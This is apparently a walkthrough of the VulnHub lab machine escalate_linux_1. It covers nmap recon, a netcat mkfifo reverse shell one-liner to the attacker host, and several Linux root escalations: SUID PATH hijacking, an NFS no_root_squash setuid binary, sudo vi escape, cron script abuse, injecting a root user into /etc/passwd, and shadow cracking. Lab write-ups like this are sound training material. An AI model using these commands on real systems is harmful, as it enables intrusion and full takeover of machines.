Initialize Access

Assume that both machines (attacker and escalate_linux_1) are on the same subnet. Use the netdiscover command to identify the target machine’s IP address

sudo netdiscover -r 192.168.x.x/24 

Add an entry with the target IP address and hostname to the /etc/hosts file.

echo '192.1xx.xxx.xxx escalate.linux' | sudo tee -a /etc/hosts

Use the Nmap to scan the target machine and identify open ports along with their corresponding services.

$ sudo nmap -A -T4 --disaple-arp-ping -Pn --min-rate=2000 -oN result 192.1xx.xxx.xxx
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 03:56 EDT
Nmap scan report for escalate.linux (192.xxx.xxx.xxx)
Host is up (0.00049s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39895/tcp   mountd
|   100005  1,2,3      41153/tcp6  mountd
|   100005  1,2,3      55700/udp   mountd
|   100005  1,2,3      55968/udp6  mountd
|   100021  1,3,4      37367/tcp   nlockmgr
|   100021  1,3,4      42315/tcp6  nlockmgr
|   100021  1,3,4      56016/udp   nlockmgr
|   100021  1,3,4      58309/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs         3-4 (RPC #100003)
MAC Address: 00:0C:29:0C:21:64 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Host: LINUX
Host script results:
| smb2-time: 
|   date: 2025-08-26T07:56:46
|_  start_date: N/A
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2025-08-26T03:56:46-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms escalate.linux (192.1xx.xx.xx)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Use whatweb to fingerprint the target and identify technologies running on the web server

Use dirsearch to enumerate directories and files on the target web server

When you access the shell.php file, it displays a single line of text: pass cmd as parameter

Pass id as the value of the cmd parameter

After successfully executing a command through the web shell, run this command to start a reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip attacker> 4444 >/tmp/f

Use the Metasploit Framework to create a listener. You can also use other tools such as netcat or penelope

use exploit/multi/handler
run lhost=eth0 lport=4444

Stabilize the shell using the command: python3 -c 'import pty;pty.spawn("/bin/bash")'

Manual Enumeration

• The hostname command will return the hostname of the target machine. Although this value can easily be changed or have a relatively meaningless string (e.g., Ubuntu-1234567), in some cases, it can provide information about the target system’s role within the corporate network (e.g., SQLSERV-PROD-01).
• The uname -a will print system information, giving us additional detail about the kernel used by the system. This will be useful when searching for any potential kernel vulnerabilities that could lead to privilege escalation.
• /proc/version The proc filesystem (procfs) provides information about the target system processes. Looking at /proc/version may give you information on the kernel version and additional data, such as whether a compiler (e.g., GCC) is installed.
• /etc/issue This file usually contains some information about the operating system but can easily be customized or changed.
• The ps command is an effective way to see the running processes on a Linux system. ps -A view all running process, ps axjf view process tree and ps aux : the aux option will show processes for all users (a), display the user that launched the process (u), and show processes that are not attached to a terminal (x). Looking at the ps aux command output, we can have a better understanding of the system and potential vulnerabilities.
• The env command will show environmental variables.
• The id command will provide a general overview of the user’s privilege level and group memberships.
• /etc/passwd discover users on the system -> cat /etc/passwd | cut -d ":" -f1. Note: this will return all users, some of whom are system or service users that would not be very useful. Another approach could be to grep for “home” as real users will most likely have their folders under the “home” directory. cat /etc/passwd | grep home
• Looking at earlier commands with the history command can give us some idea about the target system and, albeit rarely, store information such as passwords or usernames.
• The ifconfig command will give us information about the network interfaces of the system, may be a pivoting point to another network.
• netstat

- `netstat -a`: shows all listening ports and established connections.
- `netstat -at` or `netstat -au` can also be used to list TCP or UDP protocols respectively.
- `netstat -l`: list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only ports that are listening using the TCP protocol (below)
- `netstat -tp`: list connections with the service name and PID information.
- `netstat -ano`: display all sockets, do not resolves name, display timers

• find

find / -name perl*
find / -name python*
find / -name gcc*
find / -size 50M
find / -perm -u=s -type f -ls 2>/dev/null
find / -writable 2>/dev/null
find / -mtime 10
find / -atime 10
find / -cmin 10
find / -amin 10
find / -perm a=x

Apply this knowledge to the challenge. From ps aux, MySQL is running as user mysql with PID 975.

In /etc/passwd, note that the mysql user has /bin/bash as its shell

In /etc/mysql, the file secret.cnf is readable only by the mysql user. The directory also contains MySQL root credentials in mysql.cnf.

MySQL credential user: root & password: root, use this credential to log in to the MySQL server

mysql -uroot -p 

Switch to the mysql user using su and read the contents of secret.cnf. Attempting to log in with the root credential from the secret.cnf fails.

The victim machine has users from user1 to user8, so let try to use combination: <user>@12345

Automated Enumeration

• LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
• LinEnum: https://github.com/rebootuser/LinEnum
• LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
• Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
• Linux Priv Checker: https://github.com/linted/linuxprivchecker

Privilege Escalation: SUID & PATH

SUID (Set-user Identification) and SGID (Set-group Identification) allow files to be executed with the permission level of the file owner or the group owner, respectively.

Use the following command to list files that have SUID or SGID bits set

find / -perm -04000 -type f -ls 2>/dev/null

Most entries are default system files, but two files stand out:

• /home/user5/script
• /home/user3/shell

Both files are executable files

These files have the permission -rwsr-xr-x, which means they are executable by others. They are owned by root, and with the SUID bit set, they run with root privileges. Examine these files further.

When executing /home/user3/shell, the error sh: 1: ./.script.sh: not found appears. This binary has SUID and SGID bits set to root and calls system() to execute .script.sh in the same directory.

Contents of the .script.sh file

echo "You Can't Find Me"
bash -i

Similar to the shell binary, but the script calls the system function to execute the ls command.

So we can use PATH hijacking to escalate privilege. PATH in Linux is an environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined with an absolute path, Linux will start searching in folders defined under PATH.

echo $PATH
echo '/bin/bash' > /tmp/ls
chmod 777 /tmp/ls
export PATH=/tmp:$PATH

Privilege Escalation: NFS

NFS (Network File System) configuration is stored in /etc/exports. This file is created during NFS server installation and is usually world-readable. On the victim machine, check this file:

Refer back to the Nmap output. It shows that the NFS service is running on the target. Enumerate mountable shares from the Kali machine:

The key element of this privilege escalation vector is the no_root_squash option in /etc/exports. If this option is set on a writable share, an attacker can create an executable with the SUID bit set and execute it on the target system.

Mount the share to a local directory:

sudo mkdir /mnt/share
sudo mount -t nfs escalate.linux:/home/user5 /mnt/share

Create a C program that executes /bin/sh with root privileges.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}

gcc -o main main.c

Copy the file to the writable share

On the victim machine, execute this file to gain a root shell

Privilege Escalation: Sudo

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular users some flexibility on their privileges.

As shown in the /etc/passwd file above, user7 belongs to the root group. We can use this user to read the /etc/sudoers file and determine which users are allowed to run sudo commands.

Users user1, user2, and user8 have sudo privileges.

Let’s start with user1:user1@12345

user1 can run any command with sudo as root or as any other user.

Switch to user2 (password user2@12345). user2 can run any command with sudo as user1, who in turn can run any command with sudo as root.

For user8 (password user8@12345), use sudo to run /usr/bin/vi with root privileges. Refer to GTFOBins for instructions on escalating to root via vi

sudo /usr/bin/vi -c ':!/bin/sh' /dev/null

Privilege Escalation: Cron Jobs

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privileges of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.

The idea is quite simple; if there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root privileges.

Any user can read the file keeping system-wide cron jobs under /etc/crontab

In the crontab, note the entry that runs /home/user4/Desktop/autoscript.sh every 5 minutes.

Modify autoscript.sh to include a custom payload

And in our Kali machine, a reverse shell connects back

Privilege Escalation: Abuse /etc/passwd to Add Super User or Modify Root’s Password

user7 has a group ID of root. This can be leveraged to modify /etc/passwd

Copy the /etc/passwd file from the victim machine to the Kali machine.

openssl passwd -1 -salt xyz user9@12345
user9:$1$xyz$t03y2O3ybmP8UNUoFQEQl/:0:0:root:/root:/bin/bash

Replace the original /etc/passwd file with the modified version that includes a new user user9

Switch to user9 with password user9@12345

Checking group permissions shows that user4 and user7 belong to the root group. This allows user4 to modify /etc/passwd

user4 has primary group user4 and supplementary group root

In the Kali machine

Download passwdmod from the attacker machine and replace the original /etc/passwd file with the modified version

Switch to root with password root@12345

Privilege Escalation: Crack root’s password (weak password)

As shown earlier, user1, user2, and user8 are listed in the sudoersfile, which grants them root privileges through sudo. Any of these accounts can be used to read /etc/shadow

Copy original /etc/passwd and /etc/shadow file to our Kali machine

Use John to crack the root password and retrieve the plaintext.

Log in as root using the credentials root:12345

Thank you for reading. I hope you found this write-up helpful. If you notice any mistakes or have suggestions, feel free to leave a comment below.

References

[1] - https://www.vulnhub.com/entry/escalate_linux-1,323/

[2] - https://tryhackme.com/room/linprivesc

[3] - https://gtfobins.github.io/gtfobins/